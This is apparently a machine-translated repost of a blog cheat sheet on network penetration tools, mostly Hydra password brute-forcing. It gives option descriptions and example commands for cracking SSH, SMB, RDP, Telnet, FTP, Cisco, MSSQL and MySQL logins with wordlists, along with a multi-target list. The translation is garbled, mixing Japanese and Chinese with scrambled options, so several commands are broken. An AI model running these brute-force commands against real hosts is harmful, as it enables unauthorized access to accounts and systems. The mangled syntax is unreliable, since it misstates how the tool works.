(導入された共通のツールを使用して)ネットワークの浸透

ネットワークモニター:

wiresharkの

カイン

パスワードブラスト:

悪弊

詳細なパラメータ:

進捗-Rクラック継続する時間
-S SSLプロトコル接続が
指定されたポートは、-s 
指定したユーザ名-l 
-L辞書指定したユーザー名(ファイル)
-Pは、パスワードクラッキングを指定
-p指定したパスワード辞書(ファイル)は、
空のパスワードの検出を-eユーザーパスワードとプローブ(NS)を指定
スプリット:-Cユーザー名を使用することができます(ユーザ名:パスワードは)-l代わりに-pユーザー名・パスワードを使用することができ
、出力ファイル-o 
マルチスレッドの数を指定-tを、デフォルトは16件のスレッドです
詳細な手順を示して-vV 
ターゲットサーバのIP 
サービスは、サービス名を指定します(telnet、FTP、HTTP、mysqlのは、ssh)

 ケースを使用します。

SSHをクラック:
ハイドラ-L -P PASSWORD.TXT -vV USER.TXT -e -o ssh.log NS IP SSHの
亀裂のSMB:
ハイドラ-l管理者-P PASSWORD.TXT IP、SMBの
亀裂のRDP:
ハイドラIP RDP -l管理者- P PASSWORD.TXTの-Vの
クラックのTelnet:
ハイドラIPのTelnet管理-P -l -t 32 -s 23はPASSWORD.TXT NS -f -e -Vある
亀裂のFTP:
ハイドラFTP PASSWORD.TXT IP -l -t管理者-P(デフォルトの16スレッド)-vV 
FTP IPは-l管理者は-P -e NS -vV PASSWORD.TXTハイドラ
:シスコクラック
ハイドラ-Pは、Cisco IP PASSWORD.TXT 
ハイドラ-m -Pクラウド10.58.26.98はCISCO-有効PASSWORD.TXT 
ブレークのSQLServerをパスワード:
hydra.exe -l SA -P C:\ PASSWORD.TXT 192.168.25.26 MSSQL
クラックMySQLのパスワード:
-lルート-P cをhydra.exe:\ PASSWORD.TXT 192.168.25.26 mysqlの
通过文件来指定攻击目标(可以自定义端口):
hydra -l admin -p admin -M targets.txt ftp

targets.txt:

foo.bar.com 
target.com:21 
unusual.port.com:2121 
default.used.here.com 
127.0.0.1 
127.0.0.1:2121

SQLMAP

牛肉

 

おすすめ

転載: www.cnblogs.com/steven9898/p/11390542.html